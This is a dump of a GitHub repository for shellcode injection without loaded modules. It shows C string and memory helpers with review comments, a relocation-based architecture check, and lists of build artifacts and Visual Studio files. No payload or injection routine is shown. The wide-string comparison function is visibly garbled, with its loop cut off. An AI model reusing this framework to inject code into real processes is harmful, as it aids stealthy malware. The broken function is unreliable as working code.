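 *
 * Fix: the original lower-cased BOTH arguments in place (via my_sh_strlwr)
 * before delegating to my_sh_strstr.  That clobbered the caller's buffers
 * and was undefined behaviour whenever either argument was a string
 * literal.  This version never writes to either buffer; the returned
 * pointer refers to the unmodified pString, so callers that relied on the
 * match being lower-cased must fold it themselves.
 */
char* my_sh_stristr(char* pString, char* pFind)
{
    const char *start, *h, *n;

    if (!*pFind)
        return pString;

    for (start = pString; *start; start++)
    {
        for (h = start, n = pFind; *h && *n; h++, n++)
        {
            int a = (unsigned char)*h;
            int b = (unsigned char)*n;
            if (a >= 'A' && a <= 'Z') a += 'a' - 'A';
            if (b >= 'A' && b <= 'Z') b += 'a' - 'A';
            if (a != b)
                break;
        }
        /* whole needle consumed -> match at start */
        if (!*n)
            return (char *)start;
    }
    return NULL;
}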
79 |
/*
 * Length of a NUL-terminated string, not counting the terminator.
 * Same contract as strlen() except for the int return and the non-const
 * parameter.
 */
int my_sh_strlen ( char* str )
{
    char *end = str;
    while (*end)
        ++end;
    return (int)(end - str);
}
90 |
/*
 * Case-insensitive comparison of two NUL-terminated strings (ASCII letters
 * only are folded).  Returns 0 when equal, otherwise the difference between
 * the first pair of lower-cased bytes that differ; when one string is a
 * prefix of the other, the terminator (0) takes part in that difference.
 */
int my_sh_stricmp(char *dst, char *src)
{
    unsigned char c1, c2;
    do
    {
        c1 = (unsigned char)*dst++;
        c2 = (unsigned char)*src++;
        c1 = (c1 >= 'A' && c1 <= 'Z') ? (unsigned char)(c1 + 0x20) : c1;
        c2 = (c2 >= 'A' && c2 <= 'Z') ? (unsigned char)(c2 + 0x20) : c2;
    } while (c1 != 0 && c1 == c2);
    return (int)c1 - (int)c2;
}
103 |
104 | //char p[8]="" p[0]的值是0,后面7个都是随机数。
105 | //char p[8]={0} p[0]~p[7]全都是0
106 |
/*
 * Number of wchar_t units in wcs before the terminating L'\0'.
 * wcs must be a valid NUL-terminated wide string.
 */
ULONG my_sh_wcslen (wchar_t * wcs)
{
    ULONG count = 0;
    while (wcs[count] != L'\0')
        ++count;
    return count;
}
115 |
116 |
117 |
118 |
/*
 * Case-sensitive substring search.  Returns a pointer to the first
 * occurrence of str2 within str1, str1 itself when str2 is empty, or NULL
 * when there is no match.
 */
char* my_sh_strstr (char * str1,char * str2)
{
    char *start;

    if (*str2 == '\0')
        return str1;

    for (start = str1; *start != '\0'; ++start)
    {
        char *a = start;
        char *b = str2;
        while (*a != '\0' && *b != '\0' && *a == *b)
        {
            ++a;
            ++b;
        }
        /* needle fully consumed -> match at this position */
        if (*b == '\0')
            return start;
    }
    return NULL;
}
143 |
/*
 * Case-insensitive comparison of two wide strings.  The visible code copies
 * both inputs into fixed 256-byte char arrays (dst / src) and then compares
 * those byte-wise with the same A-Z folding as my_sh_stricmp.
 *
 * NOTE(review): original lines 159-170 are missing from this listing -- the
 * text between "i" and "= 'A')" on the for line was lost in extraction, most
 * likely at a '<' -- so the copy loop itself cannot be reviewed here.  Two
 * things to confirm against the real source: that the copy into dst/src is
 * bounded by the 256-byte array size and not only by len1/len2 from
 * my_sh_wcslen, and that narrowing each wchar_t to a char is intended
 * (non-ASCII code points would compare incorrectly).
 */
int my_sh_wcsicmp(wchar_t * dst1,wchar_t * src1) // wide-string variant: compares ignoring case
{
    int ch1, ch2;
    ULONG len1,len2;
    ULONG i,j;
    PUCHAR p1,p2,z1,z2;
    char dst[256]={0};
    char src[256]={0};
    p1=(PUCHAR)dst1;
    p2=(PUCHAR)src1;

    len1=my_sh_wcslen(dst1);
    len2=my_sh_wcslen(src1);

    /* garbled in the listing: the for-loop header and its body are gone */
    for (i=0,j=0;i= 'A') &&(ch1 <= 'Z') )
    ch1 += 0x20;
    if ( ((ch2 = (unsigned char)(*(z2++))) >= 'A') &&(ch2 <= 'Z') )
    ch2 += 0x20;
    } while ( ch1 && (ch1 == ch2) );
    return(ch1 - ch2);
}
177 |
/*
 * my_sh_wcscat - append the wide string src to the wide string dst.
 *
 * dst: NUL-terminated buffer that must already have room for its own
 *      contents plus src and the terminator - no size is passed and no
 *      bound is checked, exactly as in the original.
 * src: NUL-terminated wide string to append.
 *
 * Returns dst.
 */
wchar_t* my_sh_wcscat (wchar_t* dst,wchar_t* src)
{
    wchar_t *tail = dst;

    /* advance to dst's terminator */
    for (; *tail != 0; ++tail)
        ;

    /* copy src including its terminator */
    do
    {
        *tail++ = *src;
    } while (*src++ != 0);

    return dst;
}
187 |
/*
 * my_sh_strcat - append the narrow string src to dst.
 *
 * dst: NUL-terminated buffer that must already have room for its own
 *      contents plus src and the terminator - no size is passed and no
 *      bound is checked, exactly as in the original.
 * src: NUL-terminated string to append.
 *
 * Returns dst.
 */
char* my_sh_strcat (char * dst,const char * src)
{
    char *tail = dst;

    /* advance to dst's terminator */
    for (; *tail != 0; ++tail)
        ;

    /* copy src including its terminator */
    do
    {
        *tail++ = *src;
    } while (*src++ != 0);

    return dst;
}
197 |
198 |
199 |
200 |
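/*
 * my_sh_memcmp - compare cb bytes of two buffers.
 *
 * pv1, pv2: buffers of at least cb readable bytes; no NULL guard.
 * cb:       number of bytes to compare; 0 compares equal.
 *
 * Returns 0 when all cb bytes match, otherwise the difference (as unsigned
 * bytes) at the first mismatching offset.
 *
 * Fix: the original never advanced pv1/pv2, so every iteration compared
 * byte 0 of both buffers and any two buffers with an equal first byte
 * compared equal regardless of the rest. Indexing by i restores the
 * intended byte-wise compare. unsigned char is used instead of BYTE so the
 * function has no header dependency; the two are the same type on Windows.
 */
int my_sh_memcmp(void* pv1,void* pv2,size_t cb)
{
    const unsigned char *a = (const unsigned char *)pv1;
    const unsigned char *b = (const unsigned char *)pv2;
    size_t i;
    for (i = 0; i < cb; i++)
    {
        int d = (int)a[i] - (int)b[i];
        if (d != 0)
            return d; /* first mismatch decides, like the standard memcmp */
    }
    return 0;
}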
209 |
/*
 * my_sh_memcpy - copy cb bytes from pvSrc to pvDest, low address first.
 *
 * pvDest: destination with at least cb writable bytes.
 * pvSrc:  source with at least cb readable bytes.
 * cb:     byte count; 0 copies nothing.
 *
 * Returns pvDest. The copy runs forward only, so overlapping regions are
 * not handled in the memmove sense (same as the original).
 */
void* my_sh_memcpy(void* pvDest,void* pvSrc,size_t cb)
{
    unsigned char *out = (unsigned char *)pvDest;
    const unsigned char *in = (const unsigned char *)pvSrc;
    while (cb-- > 0)
        *out++ = *in++;
    return pvDest;
}
217 |
/*
 * my_sh_memset - store the byte value c into the first cb bytes of pv.
 *
 * pv: destination with at least cb writable bytes.
 * c:  fill value, truncated to one byte.
 * cb: byte count; 0 writes nothing.
 *
 * Returns pv.
 */
void* my_sh_memset(void* pv,int c,size_t cb)
{
    unsigned char *out = (unsigned char *)pv;
    unsigned char fill = (unsigned char)c;
    size_t n;
    for (n = 0; n < cb; ++n)
        out[n] = fill;
    return pv;
}
/*
 * my_sh_zeromem - zero Length bytes at Destination via my_sh_memset.
 *
 * Destination: buffer with at least Length writable bytes.
 * Length:      byte count.
 *
 * NOTE(review): this is a plain byte-store loop, not a guaranteed wipe -
 * an optimizer may drop the stores when the buffer is dead afterwards, so
 * do not rely on it for clearing secrets without checking the generated code.
 */
void my_sh_zeromem(PVOID Destination,SIZE_T Length)
{
    (void)my_sh_memset(Destination, 0, Length);
}
229 |
230 |
231 |
/*
 * Is64Os - report whether the native processor architecture is 64-bit.
 *
 * In non-HHL_DEBUG builds the ShellData block is located first: the offset
 * from ReleaseRebaseShellCode() is added to Shellcode_Final_End (see the
 * inline comment, which says this is restored when the shellcode is
 * generated). In HHL_DEBUG builds lpData is not declared here, so it must
 * be provided elsewhere - not visible in this listing, confirm.
 *
 * Returns TRUE for PROCESSOR_ARCHITECTURE_AMD64 or _IA64 as reported by the
 * xGetNativeSystemInfo pointer held in lpData, FALSE otherwise.
 */
BOOLEAN Is64Os()
{
#ifndef HHL_DEBUG
    // relocate the shellcode
    DWORD offset=ReleaseRebaseShellCode();
    PShellData lpData= (PShellData)(offset + (DWORD)Shellcode_Final_End);// restored when the shellcode is generated
#endif
    SYSTEM_INFO si;
    lpData->xGetNativeSystemInfo(&si);
    /* anything other than the two 64-bit architectures is reported as 32-bit */
    if (si.wProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64 &&
        si.wProcessorArchitecture != PROCESSOR_ARCHITECTURE_IA64)
    {
        return FALSE;
    }
    return TRUE;
}
251 |
/*
 * ShellCode_Ntapi_Utility_End - empty-bodied function with no side effects.
 *
 * The trivial local arithmetic only gives the function a body. From its
 * name (and the Shellcode_Final_End symbol used above) it presumably serves
 * as an end-of-region marker whose address is taken elsewhere - confirm
 * against the callers; nothing here depends on that.
 */
void ShellCode_Ntapi_Utility_End()
{
    int marker = 0;
    marker += 1;
}
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode_ntapi_utility.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode_ntapi_utility.h
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/DLLtest.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/DLLtest.cpp
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/DLLtest.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/DLLtest.vcproj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/DLLtest.vcproj.DESKTOP-AS29ISP.YYYYY.user:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/DLLtest.vcproj.storm-PC.storm.user:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.dll.embed.manifest:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.dll.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/DLLtest.dll.embed.manifest.res
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.dll.intermediate.manifest:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/DLLtest.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/DLLtest.pch
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/dllmain.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/dllmain.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | 动态链接库:DLLtest 项目概述
3 | ========================================================================
4 |
5 | 应用程序向导已为您创建了此 DLLtest DLL。
6 |
7 | 本文件概要介绍组成 DLLtest 应用程序的每个文件的内容。
8 |
9 |
10 |
11 | DLLtest.vcproj
12 | 这是使用应用程序向导生成的 VC++ 项目的主项目文件,
13 | 其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
14 |
15 | DLLtest.cpp
16 | 这是主 DLL 源文件。
17 |
18 | 此 DLL 在创建时不导出任何符号。因此,在生成此 DLL 时
19 | 将不会产生 .lib 文件。如果希望此项目
20 | 成为其他某个项目的项目依赖项,则需要
21 | 添加代码以从 DLL 导出某些符号,
22 | 以便产生一个导出库,或者,也可以在项目“属性页”对话框中的
23 | “链接器”文件夹中,将“常规”属性页上的
24 | “忽略输入库”属性设置为“是”。
25 |
26 | /////////////////////////////////////////////////////////////////////////////
27 | 其他标准文件:
28 |
29 | StdAfx.h, StdAfx.cpp
30 | 这些文件用于生成名为 DLLtest.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
31 |
32 | /////////////////////////////////////////////////////////////////////////////
33 | 其他注释:
34 |
35 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
36 |
37 | /////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/DLLtest.dll.intermediate.manifest:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/DLLtest.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/DLLtest.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/DLLtest.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/DLLtest.pch
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/dllmain.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/dllmain.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/dllmain.cpp
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/stdafx.cpp
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/stdafx.h
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/targetver.h
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/DLLtest.dll.intermediate.manifest:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/DLLtest.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/DLLtest.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/DLLtest.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/DLLtest.pch
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/dllmain.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/dllmain.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject.ncb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "UnModuelInject", "UnModuelInject\UnModuelInject.vcproj", "{F456649B-3A95-4E96-B701-037F80B06BA1}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLtest", "DLLtest\DLLtest.vcproj", "{B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Debug|Win32.Build.0 = Debug|Win32
18 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Debug|x64.ActiveCfg = Debug|x64
19 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Debug|x64.Build.0 = Debug|x64
20 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Release|Win32.ActiveCfg = Release|Win32
21 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Release|Win32.Build.0 = Release|Win32
22 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Release|x64.ActiveCfg = Release|x64
23 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Release|x64.Build.0 = Release|x64
24 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Debug|Win32.ActiveCfg = Debug|Win32
25 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Debug|Win32.Build.0 = Debug|Win32
26 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Debug|x64.ActiveCfg = Debug|x64
27 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Debug|x64.Build.0 = Debug|x64
28 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Release|Win32.ActiveCfg = Release|Win32
29 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Release|Win32.Build.0 = Release|Win32
30 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Release|x64.ActiveCfg = Release|x64
31 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Release|x64.Build.0 = Release|x64
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject.suo
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuelInject.exe.embed.manifest:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuelInject.exe.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/UnModuelInject.exe.embed.manifest.res
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuelInject.exe.intermediate.manifest:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuelInject.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/UnModuelInject.pch
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuleInject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/UnModuleInject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/Unmodule_Inject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/Unmodule_Inject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/wow64ext.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/wow64ext.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/x32ext.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/x32ext.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | 控制台应用程序:UnModuelInject 项目概述
3 | ========================================================================
4 |
5 | 应用程序向导已为您创建了此 UnModuelInject 应用程序。
6 |
7 | 本文件概要介绍组成 UnModuelInject 应用程序的每个文件的内容。
8 |
9 |
10 |
11 | UnModuelInject.vcproj
12 | 这是使用应用程序向导生成的 VC++ 项目的主项目文件,
13 | 其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
14 |
15 | UnModuelInject.cpp
16 | 这是主应用程序源文件。
17 |
18 | /////////////////////////////////////////////////////////////////////////////
19 | 其他标准文件:
20 |
21 | StdAfx.h, StdAfx.cpp
22 | 这些文件用于生成名为 UnModuelInject.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
23 |
24 | /////////////////////////////////////////////////////////////////////////////
25 | 其他注释:
26 |
27 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
28 |
29 | /////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/UnModuelInject.exe.intermediate.manifest:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/UnModuelInject.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/UnModuelInject.pch
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/UnModuleInject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/UnModuleInject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/Unmodule_Inject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/Unmodule_Inject.obj
--------------------------------------------------------------------------------
